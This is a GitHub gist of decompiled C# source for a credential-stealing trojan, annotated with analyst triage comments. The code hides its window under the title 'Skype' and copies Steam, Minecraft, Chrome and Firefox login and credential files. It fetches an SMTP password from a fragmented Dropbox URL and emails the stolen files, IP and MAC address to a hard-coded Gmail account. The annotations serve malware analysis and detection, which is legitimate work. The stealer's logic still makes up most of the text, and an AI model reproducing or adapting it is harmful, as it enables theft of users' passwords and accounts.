@Flakebi
Created June 25, 2015 17:26
C# decompiled trojan
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Net;
using System.Net.Mail;
using System.Net.NetworkInformation;
using System.Runtime.CompilerServices;
using System.Text.RegularExpressions;
using System.Threading;
using System.Timers;
using System.Windows.Forms;
using WIN3.My;
namespace WIN3
{
[DesignerGenerated]
public class Form1 : Form
{
//
// Properties
//
/// <summary>
/// Plain get/set accessor for the form's list box.
/// </summary>
// Triage note: in this listing the control is only created and laid out in
// InitializeComponent; no visible method adds items to it. The accessor itself
// carries no behaviour beyond storing the reference.
internal virtual ListBox ListBox1
{
    [DebuggerNonUserCode]
    get
    {
        return _ListBox1;
    }

    [DebuggerNonUserCode]
    [MethodImpl(MethodImplOptions.Synchronized)]
    set
    {
        _ListBox1 = value;
    }
}
/// <summary>
/// Accessor for the form's rich text box. The setter detaches the
/// <c>TextChanged</c> handler from the previous control (if any), stores the new
/// control, and attaches the handler to it (if any).
/// </summary>
// Triage note: this unhook / assign / rehook shape matches what the VB.NET compiler
// emits for a WithEvents field, so it is most likely generated code rather than
// author logic. The handler it wires (RichTextBox1_TextChanged) is empty in this
// listing; the control matters because Form1_Load appends its Text to the outgoing
// mail body under the "ChromeData:" label.
internal virtual RichTextBox RichTextBox1
{
    [DebuggerNonUserCode]
    get
    {
        return _RichTextBox1;
    }

    [DebuggerNonUserCode]
    [MethodImpl(MethodImplOptions.Synchronized)]
    set
    {
        EventHandler textChangedHandler = new EventHandler(this.RichTextBox1_TextChanged);

        // Detach from the control being replaced so it no longer calls back into this form.
        if (_RichTextBox1 != null)
        {
            _RichTextBox1.TextChanged -= textChangedHandler;
        }

        _RichTextBox1 = value;

        // Attach to the replacement control, if one was supplied.
        if (_RichTextBox1 != null)
        {
            _RichTextBox1.TextChanged += textChangedHandler;
        }
    }
}
/// <summary>
/// Accessor for a timer whose <c>Elapsed</c> event is routed to <c>Timer1</c>.
/// The setter detaches the handler from the old timer, stores the new one, and
/// attaches the handler again.
/// </summary>
// Triage notes:
//  * "private virtual" is not legal C#; it is kept exactly as the decompiler printed it.
//  * The Elapsed / ElapsedEventHandler pair implies System.Timers.Timer, whereas Timer2
//    uses Tick. With both System.Timers and System.Windows.Forms imported, the bare
//    name "Timer" is ambiguous in this listing.
//  * Nothing visible in this listing assigns time1, and the Timer1 handler is empty.
private virtual Timer time1
{
    [DebuggerNonUserCode]
    get
    {
        return _time1;
    }

    [DebuggerNonUserCode]
    [MethodImpl(MethodImplOptions.Synchronized)]
    set
    {
        ElapsedEventHandler elapsedHandler = new ElapsedEventHandler(this.Timer1);

        if (_time1 != null)
        {
            _time1.Elapsed -= elapsedHandler;
        }

        _time1 = value;

        if (_time1 != null)
        {
            _time1.Elapsed += elapsedHandler;
        }
    }
}
/// <summary>
/// Accessor for the form's tick timer. The setter detaches <c>Timer2_Tick</c> from
/// the previous timer, stores the new one, and attaches the handler to it.
/// </summary>
// Triage note: this is the only timer the visible code actually uses. It is created
// in InitializeComponent with Interval = 9000 and started twice from Form1_Load; its
// Tick handler only reads Debugger.IsAttached.
internal virtual Timer Timer2
{
    [DebuggerNonUserCode]
    get
    {
        return _Timer2;
    }

    [DebuggerNonUserCode]
    [MethodImpl(MethodImplOptions.Synchronized)]
    set
    {
        EventHandler tickHandler = new EventHandler(this.Timer2_Tick);

        if (_Timer2 != null)
        {
            _Timer2.Tick -= tickHandler;
        }

        _Timer2 = value;

        if (_Timer2 != null)
        {
            _Timer2.Tick += tickHandler;
        }
    }
}
//
// Constructors
//
/// <summary>
/// Type initializer: creates the static list of weak references that
/// <c>__ENCAddToList</c> appends to.
/// </summary>
[DebuggerNonUserCode]
static Form1()
{
    // Note: this type is marked as 'beforefieldinit'.
    __ENCList = new List<WeakReference>();
}
/// <summary>
/// Instance constructor: subscribes <c>Form1_Load</c> to the form's Load event,
/// registers the instance in the static tracking list, and builds the controls.
/// </summary>
// Triage note: the constructor itself does nothing sensitive. Everything of interest
// is reached through the Load subscription below, so the collection routine runs when
// the form is loaded rather than when the object is constructed.
[DebuggerNonUserCode]
public Form1()
{
    EventHandler onLoad = new EventHandler(this.Form1_Load);
    base.Load += onLoad;

    Form1.__ENCAddToList(this);
    this.InitializeComponent();
}
//
// Static Methods
//
/// <summary>
/// Appends a weak reference to <paramref name="value"/> to the static tracking list.
/// When the list is full (Count == Capacity) it first compacts the list in place,
/// keeping only entries whose targets are still alive, and trims the capacity.
/// </summary>
/// <param name="value">Object to track; wrapped via RuntimeHelpers.GetObjectValue.</param>
// Triage note: the "__ENC" naming and this exact compaction routine match the
// Edit-and-Continue bookkeeping the VB.NET compiler adds to debug builds, so this is
// most likely compiler boilerplate. If so, it also hints that the sample was shipped
// as a Debug build - worth confirming against the binary's metadata.
[DebuggerNonUserCode]
private static void __ENCAddToList(object value)
{
    // The lock is taken on a snapshot of the static field, as in the original.
    List<WeakReference> gate = Form1.__ENCList;
    lock (gate)
    {
        checked
        {
            if (Form1.__ENCList.Count == Form1.__ENCList.Capacity)
            {
                int kept = 0;
                int lastIndex = Form1.__ENCList.Count - 1;

                // Slide live entries towards the front, preserving their order.
                for (int scan = 0; scan <= lastIndex; scan++)
                {
                    if (Form1.__ENCList[scan].IsAlive)
                    {
                        if (scan != kept)
                        {
                            Form1.__ENCList[kept] = Form1.__ENCList[scan];
                        }
                        kept++;
                    }
                }

                // Drop the dead tail and shrink the backing storage to fit.
                Form1.__ENCList.RemoveRange(kept, Form1.__ENCList.Count - kept);
                Form1.__ENCList.Capacity = Form1.__ENCList.Count;
            }

            Form1.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
        }
    }
}
//
// Methods
//
/// <summary>
/// Disposes the designer component container when called with
/// <paramref name="disposing"/> set, then always forwards to the base class.
/// </summary>
/// <param name="disposing">True when managed resources should be released.</param>
// Triage note: only this.components is released here. Nothing in this method touches
// the files, web clients or mail objects created in Form1_Load.
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
    try
    {
        if (disposing && this.components != null)
        {
            this.components.Dispose();
        }
    }
    finally
    {
        // The base call runs even if disposing the container throws.
        base.Dispose(disposing);
    }
}
// Form1_Load - Load-event handler (subscribed in the constructor). All of the sample's
// collection and exfiltration logic visible in this listing lives in this one method.
//
// Reading notes for analysts:
//  * This is raw decompiler output and does not compile as C#: path literals contain
//    unescaped backslashes, the regex literal contains unescaped quotes, the message body
//    contains raw line breaks inside string literals, and the tail of the method
//    (switch(ILLabel[] ...), endfilter(...)) is IL the decompiler could not express.
//  * The num / num2 / num3 counters together with ProjectData.ClearProjectError() look
//    like the decompiler's rendering of VB "On Error ..." handling. Presumably a failing
//    statement is skipped and execution resumes at the next one - confirm against the IL.
//  * Order of operations: hide the window -> read host facts -> stage credential-bearing
//    files from Steam, Minecraft, Chrome and Firefox into the temp directory and attach
//    them to a MailMessage -> look up the MAC and public IP -> download a text file whose
//    content is used as the SMTP password -> send the mail.
//  * Host artefacts: every File.Copy below writes into the temp directory under fixed
//    names (Config.vdf, SteamAppData.vdf, Loginusers.vdf, ssfn*, launcher_profiles.json,
//    "Login Data", logins.json, key3.db). No call in this method deletes them, so they
//    should still be on disk after execution.
//  * Network artefacts: one HTTP GET to whatismyipaddress.com, one HTTPS download from
//    dropbox.com, then SMTP submission to smtp.gmail.com on port 587 with SSL enabled.
private void Form1_Load(object sender, EventArgs e)
{
int num2;
int num3;
try
{
IL_01:
int num = 1;
// Host facts that end up in the mail body: OS name and the local timestamp.
string oSFullName = MyProject.Computer.Info.OSFullName;
IL_15:
num = 2;
string text = Conversions.ToString(DateTime.Now);
IL_24:
num = 3;
// The next seven blocks are dead code: "sdsdsd" has six characters, so the comparison
// with 4 is always false, and the branch bodies are empty anyway. Possibly filler to
// change the binary's shape - the purpose cannot be determined from the listing.
bool flag = "sdsdsd".Length == 4;
if (flag)
{
}
IL_3A:
IL_3B:
num = 5;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_51:
IL_52:
num = 7;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_68:
IL_69:
num = 9;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_80:
IL_81:
num = 11;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_98:
IL_99:
num = 13;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_B0:
IL_B1:
num = 15;
flag = ("sdsdsd".Length == 4);
if (flag)
{
}
IL_C8:
IL_C9:
num = 17;
// Conceal the window: hidden, no icon, no taskbar button. The user sees no UI while
// the rest of the method runs.
this.Hide();
IL_D4:
num = 18;
this.ShowIcon = false;
IL_E0:
num = 19;
this.ShowInTaskbar = false;
IL_EC:
num = 20;
// str = first three characters of the System folder path (presumably the drive root,
// e.g. "C:\"); it is used below as the prefix for hard-coded paths.
string str = Strings.Mid(Environment.GetFolderPath(Environment.SpecialFolder.System), 1, 3);
IL_100:
num = 21;
string userName = Environment.UserName;
IL_10B:
num = 22;
// temp = staging directory for every file that is copied and attached below.
string temp = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
IL_125:
num = 23;
this.Timer2.Start();
IL_135:
num = 24;
// Single outgoing message; all staged files are added to it as attachments.
MailMessage mailMessage = new MailMessage();
IL_140:
num = 25;
// Result flags reported in the mail body (labels taken from the body text below):
//   flag2 = "SteamStuff Found?", flag3 = "Firefox collected?", flag4 = "MineCraft Found?",
//   flag6 = "Chrome Detected?".
// flag5 is always true and flag7 is always false; neither is reassigned in this method.
bool flag2 = false;
IL_147:
num = 26;
bool flag3 = false;
IL_14E:
num = 27;
bool flag4 = false;
IL_155:
num = 28;
bool flag5 = true;
IL_15C:
num = 29;
bool flag6 = false;
IL_163:
num = 30;
IL_16A:
num = 31;
IL_171:
num = 32;
bool flag7 = false;
IL_178:
num = 33;
// text2 is the GUID of the *type* of MyProject.Computer.Info, not a value read from the
// machine, so it is presumably the same on every host and of little use as a victim ID.
string text2 = MyProject.Computer.Info.GetType().GUID.ToString();
IL_1A1:
num = 34;
// text3 (serial-port count) is computed but not used anywhere else in this method.
string text3 = MyProject.Computer.Ports.SerialPortNames.Count.ToString();
IL_1C4:
num = 35;
// --- Steam ---
// The install path is read from the registry (HKLM, Wow6432Node view). If the value is
// missing, text4 is null/empty and the copies below operate on relative paths.
string text4 = Conversions.ToString(MyProject.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\Software\Wow6432Node\Valve\Steam", "Installpath", null));
IL_1E9:
ProjectData.ClearProjectError();
num2 = -2;
IL_1F2:
num = 37;
// Three Steam configuration files are copied into temp. File.Copy is called without the
// overwrite argument, so it fails if a same-named file is already staged there.
File.Copy(text4 + "\config\Config.vdf", temp + "\Config.vdf");
IL_214:
num = 38;
File.Copy(text4 + "\config\SteamAppData.vdf", temp + "\SteamAppData.vdf");
IL_236:
num = 39;
File.Copy(text4 + "\config\Loginusers.vdf", temp + "\Loginusers.vdf");
IL_258:
ProjectData.ClearProjectError();
num2 = -3;
IL_261:
num = 41;
DirectoryInfo directoryInfo = new DirectoryInfo(text4);
IL_26E:
num = 42;
// Every file matching ssfn* in the Steam root (commonly Steam's sentry files) is copied
// to temp and attached.
FileInfo[] files = directoryInfo.GetFiles("ssfn*");
IL_280:
num = 43;
FileInfo[] array = files;
int i = 0;
checked
{
while (i < array.Length)
{
FileInfo fileInfo = array[i];
IL_297:
ProjectData.ClearProjectError();
num2 = -4;
IL_2A0:
num = 45;
File.Copy(text4 + "\" + fileInfo.Name, temp + "\" + fileInfo.Name);
IL_2D0:
num = 46;
Attachment item = new Attachment(temp + "\" + fileInfo.Name);
IL_2EE:
num = 47;
mailMessage.Attachments.Add(item);
IL_301:
num = 48;
// flag2 is only evaluated inside this loop, and the literal has no space before "(x86)",
// so on a default Windows layout this check probably never matches and the report
// likely shows "SteamStuff Found? = False" even when files were attached.
flag = Directory.Exists(str + "Program Files(x86)\Steam");
if (flag)
{
IL_31C:
num = 49;
flag2 = true;
}
IL_323:
i++;
IL_32A:
num = 51;
}
IL_340:
ProjectData.ClearProjectError();
num2 = -5;
IL_349:
num = 53;
// Attach the three staged Steam configuration files.
Attachment item2 = new Attachment(temp + "\Config.vdf");
IL_360:
num = 54;
Attachment item3 = new Attachment(temp + "\SteamAppData.vdf");
IL_377:
num = 55;
Attachment item4 = new Attachment(temp + "\Loginusers.vdf");
IL_38E:
num = 56;
mailMessage.Attachments.Add(item2);
IL_3A1:
num = 57;
mailMessage.Attachments.Add(item3);
IL_3B4:
num = 58;
mailMessage.Attachments.Add(item4);
IL_3C7:
ProjectData.ClearProjectError();
num2 = -6;
IL_3D0:
num = 60;
// --- Minecraft ---
// If the launcher profile file exists under the current user's roaming AppData, it is
// staged, attached, and flag4 is set.
flag = File.Exists(str + "Users\" + Environment.UserName + "\AppData\Roaming\.minecraft\launcher_profiles.json");
if (!flag)
{
goto IL_452;
}
IL_3F5:
num = 61;
File.Copy(str + "Users\" + Environment.UserName + "\AppData\Roaming\.minecraft\launcher_profiles.json", temp + "\launcher_profiles.json");
IL_421:
num = 62;
Attachment item5 = new Attachment(temp + "\launcher_profiles.json");
IL_438:
num = 63;
mailMessage.Attachments.Add(item5);
IL_44B:
num = 64;
flag4 = true;
IL_452:
IL_453:
ProjectData.ClearProjectError();
num2 = -7;
IL_45C:
num = 67;
IL_467:
num = 68;
// --- Chrome ---
// Only the "Default" profile is checked. If its "Login Data" file exists it is passed to
// File.Decrypt, copied to temp and attached.
flag = Directory.Exists(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default");
if (!flag)
{
goto IL_535;
}
IL_48C:
num = 69;
bool flag8 = File.Exists(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data");
if (!flag8)
{
goto IL_532;
}
IL_4B1:
num = 70;
// File.Decrypt is the NTFS file-encryption (EFS) API; it acts on the file as a whole and
// modifies the original in place if it was EFS-encrypted - a change an investigator can
// look for on the source file.
File.Decrypt(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data");
IL_4CE:
num = 71;
File.Copy(str + "Users\" + userName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data", temp + "\Login Data");
IL_4F7:
num = 72;
Attachment item6 = new Attachment(temp + "\Login Data");
IL_50E:
num = 73;
mailMessage.Attachments.Add(item6);
IL_521:
num = 74;
flag6 = true;
IL_528:
num = 75;
// Tz87fA.GetChrome() is defined outside this listing. Presumably it is what fills
// RichTextBox1 (sent later as "ChromeData:") - TODO confirm in the full assembly.
Tz87fA.GetChrome();
IL_532:
IL_533:
goto IL_53A;
IL_535:
num = 78;
IL_53A:
IL_53B:
ProjectData.ClearProjectError();
num2 = -8;
IL_544:
num = 81;
// --- Firefox ---
// Each top-level profile directory matching *.default has its logins.json and key3.db
// copied to temp (fixed destination names, so a second profile collides with the first)
// and attached.
string path = str + "Users\" + userName + "\AppData\Roaming\Mozilla\Firefox\Profiles";
IL_55D:
ProjectData.ClearProjectError();
num2 = -9;
IL_566:
num = 83;
string[] directories = Directory.GetDirectories(path, "*.default", SearchOption.TopDirectoryOnly);
IL_579:
num = 84;
string[] array2 = directories;
int j = 0;
while (j < array2.Length)
{
string str2 = array2[j];
IL_590:
num = 85;
File.Copy(str2 + "\logins.json", temp + "\logins.json");
IL_5B2:
num = 86;
File.Copy(str2 + "\key3.db", temp + "\key3.db");
IL_5D4:
num = 87;
Attachment item7 = new Attachment(temp + "\key3.db");
IL_5EA:
num = 88;
Attachment item8 = new Attachment(temp + "\logins.json");
IL_601:
num = 89;
mailMessage.Attachments.Add(item7);
IL_613:
num = 90;
mailMessage.Attachments.Add(item8);
IL_626:
num = 91;
// The existence check happens after the copy and attach steps; it only sets the
// "Firefox collected?" flag for the report.
flag8 = File.Exists(str2 + "\logins.json");
if (flag8)
{
IL_641:
num = 92;
flag3 = true;
}
IL_648:
j++;
IL_64F:
num = 94;
}
IL_665:
num = 95;
// --- Host identification ---
// MAC address of the interface at index 1. The index is hard-coded, so this throws on
// hosts with fewer than two interfaces and may report a virtual adapter on others.
NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces();
IL_670:
num = 96;
string text5 = allNetworkInterfaces[1].GetPhysicalAddress().ToString();
IL_684:
ProjectData.ClearProjectError();
num2 = -10;
IL_68D:
num = 98;
// Public IP lookup: plain-HTTP GET to a third-party site, then a regex over the returned
// HTML. This request is the first outbound network event of the method. The WebClient is
// never disposed.
WebClient webClient = new WebClient();
IL_698:
num = 99;
string input = webClient.DownloadString("http://whatismyipaddress.com/");
IL_6AA:
num = 100;
Match match = Regex.Match(input, "href="[/]{0,}whatismyipaddress.com[/]ip[/](.{0,}?)"");
IL_6BC:
num = 101;
string value = match.Groups[1].Value;
IL_6D4:
num = 102;
string str3 = Strings.Mid(Environment.GetFolderPath(Environment.SpecialFolder.System), 1, 3);
IL_6E8:
num = 103;
// Security-product check: the presence of this directory is only reported in the mail
// body (flag9); it does not change what the method does.
flag8 = Directory.Exists(str3 + "Program Files\MalwareBytes Anti Exploit");
if (!flag8)
{
goto IL_70A;
}
IL_703:
num = 104;
bool flag9 = true;
IL_70A:
IL_70B:
num = 106;
// --- Remote secret ---
// A Dropbox share URL is assembled from fragments, so the full URL never appears as one
// string in the binary. The concatenation order further down is text6, text7, text8,
// text10, text9, text11, text12 - note text10 precedes text9. String-based detection
// has to match the fragments or the reassembled value, not a single literal.
string text6 = "https://www.dropbox.com";
IL_716:
num = 107;
IL_721:
num = 108;
string text7 = "/s/";
IL_72C:
num = 109;
string text8 = "yl1q28t";
IL_737:
num = 110;
string text9 = "28n";
IL_742:
num = 111;
string text10 = "mwn2p";
IL_74D:
num = 112;
string text11 = "/PW.txt";
IL_758:
num = 113;
string text12 = "?dl=1";
IL_763:
num = 114;
IL_76E:
num = 115;
IL_779:
num = 116;
IL_784:
num = 117;
IL_78F:
num = 118;
IL_79A:
num = 119;
IL_7A5:
num = 120;
IL_7B0:
ProjectData.ClearProjectError();
num2 = -11;
IL_7B9:
num = 122;
// The downloaded text is later read in full and used as the SMTP account password, so
// the sending credential is not stored in the binary itself. Neither the WebClient nor
// the StreamReader is disposed.
WebClient webClient2 = new WebClient();
IL_7C4:
num = 123;
StreamReader streamReader = new StreamReader(webClient2.OpenRead(string.Concat(new string[] {
text6,
text7,
text8,
text10,
text9,
text11,
text12
})));
IL_816:
num = 124;
// flag7 is never set to true in this method, so this gate always lets the send proceed.
flag8 = !flag7;
if (!flag8)
{
goto IL_9FB;
}
IL_828:
ProjectData.ClearProjectError();
num2 = -12;
IL_831:
num = 126;
// --- Exfiltration over SMTP ---
// Indicators present in this block: SMTP host, sender and recipient addresses, the
// "[Mugger_v1.4]" subject tag and the "==Mugger==" body banner. The message leaves via
// authenticated submission (port 587, SSL enabled), so the payload is not readable on
// the wire; endpoint telemetry (process -> smtp.gmail.com:587) is the practical signal.
SmtpClient smtpClient = new SmtpClient("smtp.gmail.com");
IL_841:
num = 127;
mailMessage.From = new MailAddress("jasonmare6@gmail.com");
IL_857:
num = 128;
mailMessage.To.Add("jasonmare111@gmail.com");
IL_870:
num = 129;
mailMessage.Subject = "[User- " + Environment.UserName + "] - [Mugger_v1.4] " + Conversions.ToString(DateTime.Now);
IL_89D:
num = 130;
// Body = collected host facts, the result flags, and the contents of RichTextBox1.
// The string literals below contain raw line breaks as printed by the decompiler.
mailMessage.Body = string.Concat(new string[] {
"==Mugger==
UserIP: ",
value,
"
UserMacaddress:",
text5,
"
SteamStuff Found? = ",
flag2.ToString(),
"
Firefox collected? = ",
flag3.ToString(),
"
Chrome Detected? = ",
flag6.ToString(),
"
",
oSFullName,
"
",
text,
"
",
text2,
"
MineCraft Found? = ",
flag4.ToString(),
"
MalwareBytes Detected?= ",
flag9.ToString(),
"
ChromeData:
",
this.RichTextBox1.Text
});
IL_9A6:
num = 131;
smtpClient.Port = 587;
IL_9BA:
num = 132;
// Password = entire content of the file downloaded above.
smtpClient.Credentials = new NetworkCredential("jasonmare6@gmail.com", streamReader.ReadToEnd());
IL_9DA:
num = 133;
smtpClient.EnableSsl = true;
IL_9EA:
num = 134;
smtpClient.Send(mailMessage);
IL_9FB:
IL_9FC:
num = 136;
// flag5 is always true and the branch is empty: no effect.
flag8 = flag5;
if (flag8)
{
}
IL_A0B:
IL_A0C:
num = 138;
this.Timer2.Start();
IL_A1F:
goto IL_CB1;
IL_A28:;
}
// From here to the end the decompiler could not translate the IL: the two "switch"
// lines and "endfilter" are not C#. They appear to be the resume dispatch and exception
// filter of the VB error handler (which statement to continue at after a failure).
// Treat this tail as opaque and read the IL directly if its exact behaviour matters.
int arg_A2F_0 = num3 + 1;
num3 = 0;
switch(ICSharpCode.Decompiler.ILAst.ILLabel[], arg_A2F_0);
IL_C64:
goto IL_CA6;
num3 = num;
switch(ICSharpCode.Decompiler.ILAst.ILLabel[], (num2 > -2) ? num2 : 1);
IL_C82:
goto IL_CA6;
}
object arg_C84_0;
endfilter(arg_C84_0 is Exception & num2 > 0 & num3 == 0);
IL_CA6:
throw ProjectData.CreateProjectError(-2146828237);
IL_CB1:
if (num3 != 0)
{
ProjectData.ClearProjectError();
}
}
/// <summary>
/// Designer-style setup: creates the component container, the tick timer, a list box
/// and a rich text box, positions and sizes the controls, and sets the form's
/// properties.
/// </summary>
// Triage notes:
//  * The window title is set to "Skype" while the type is WIN3.Form1. A title that
//    names an unrelated, well-known application is a masquerading indicator; note that
//    Form1_Load hides the window anyway.
//  * Timer2 fires every 9000 ms; its Tick handler only reads Debugger.IsAttached.
//  * "Timer" takes a container argument and exposes Tick here, which implies the
//    Windows Forms timer; the bare name is ambiguous given the file's using directives.
[DebuggerStepThrough]
private void InitializeComponent()
{
    this.components = new Container();
    this.Timer2 = new Timer(this.components);
    this.ListBox1 = new ListBox();
    this.RichTextBox1 = new RichTextBox();
    this.SuspendLayout();

    // Timer2
    this.Timer2.Interval = 9000;

    // ListBox1
    this.ListBox1.FormattingEnabled = true;
    this.ListBox1.Location = new Point(0, 51);
    this.ListBox1.Name = "ListBox1";
    this.ListBox1.Size = new Size(120, 95);
    this.ListBox1.TabIndex = 0;

    // RichTextBox1
    this.RichTextBox1.Location = new Point(126, 12);
    this.RichTextBox1.Name = "RichTextBox1";
    this.RichTextBox1.Size = new Size(286, 231);
    this.RichTextBox1.TabIndex = 1;
    this.RichTextBox1.Text = "";

    // Form1
    this.AutoScaleDimensions = new SizeF(6, 13);
    this.AutoScaleMode = AutoScaleMode.Font;
    this.ClientSize = new Size(424, 255);
    this.Controls.Add(this.RichTextBox1);
    this.Controls.Add(this.ListBox1);
    this.Name = "Form1";
    this.Text = "Skype";
    this.ResumeLayout(false);
}
// TextChanged handler wired by the RichTextBox1 property setter. The body is empty in
// this listing, so changes to the text box trigger no visible logic here.
private void RichTextBox1_TextChanged(object sender, EventArgs e)
{
}
// Elapsed handler wired by the time1 property setter. The body is empty, and nothing in
// this listing assigns time1, so this handler is effectively unused here.
private void Timer1(object obj, ElapsedEventArgs ti)
{
}
/// <summary>
/// Tick handler for Timer2. Reads <c>Debugger.IsAttached</c> and does nothing with
/// the result.
/// </summary>
// Triage note: this has the shape of a periodic debugger check, but the branch body is
// empty in this listing, so no reaction to an attached debugger is visible. Whether
// the reaction was removed, never written, or lost in decompilation cannot be told
// from here - check the IL before relying on either reading.
private void Timer2_Tick(object sender, EventArgs e)
{
    if (Debugger.IsAttached)
    {
    }
}
}
}